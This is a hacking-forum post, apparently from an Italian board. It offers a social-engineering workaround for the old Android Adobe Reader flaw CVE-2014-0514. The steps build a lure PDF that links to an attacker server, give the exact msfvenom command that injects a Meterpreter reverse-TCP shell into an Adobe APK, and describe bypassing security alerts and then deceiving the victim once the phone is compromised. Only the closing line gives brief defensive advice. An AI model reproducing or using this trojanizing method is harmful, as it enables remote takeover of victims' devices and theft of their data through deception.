Discussione CVE-2014-0514 not working on updated Android devices? Firing a workaround!

Stato
Discussione chiusa ad ulteriori risposte.

Netcat

Utente Jade
17 Gennaio 2022
456
129
335
691
CVE-2014-0514 is an old Android vulnerability that leveraged a flaw in Adobe Reader <11 where proper checks of JavaScript inputs were not performed. The vulnerability opened opportunities for exploitation with SE, as there are so many excusants to persuade someone into opening a pdf, thus very important.

They made this vulnerability so hard to exploit that you have to create a Lab with a VM carrying Android 4.0, the vulnerable application and a crafted .pdf
If one of these requirements are missing, the exploit will fail. I tried myself to use it against my Android 12 with Adobe 11.0, it didn't work even with the vulnerable app installed correctly. You can't just execute JavaScript code against old Adobe 11 if it is installed on modern Android device, apparently.

The proverb say "If you can't go against it, then go with it"

Step 1. Download any version of Adobe, save to desktop, rename it "adobe.apk";

Step 2. Download and install OpenJDK, apktool, apksigner and zipalign on your device;

Step 3. Create manually a pdf document and call it Example.pdf, open it, and type inside "You need Adobe to view this content, get Adobe for Android: https://bad-server.com"

Step 3. Where bad-server.com is your own webserver, you are hosting on it a malicious version of Adobe injiected with the following command "msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -x adobe.apk -o evil-adobe.apk", the victim is tricked to download and install a trojanized version of Adobe to display the content of your pdf.

Step 4. Once you found a way to bypass security alerts and general security policy, you finally get your reverse shell, use it to quickly swap the pdf of the victim with an actual "unlocked" copy to fool him into thinking that Adobe unlocked the pdf (of course)

How to protect against this type of SE attack? Just don't trust pdfs claiming that they "desperately need" Adobe to work. Android can just read pdfs with basekit features, such as opening 'em in web browser, you don't truly need Adobe for pdfs unless you are actively workin on 'em.
 
Stato
Discussione chiusa ad ulteriori risposte.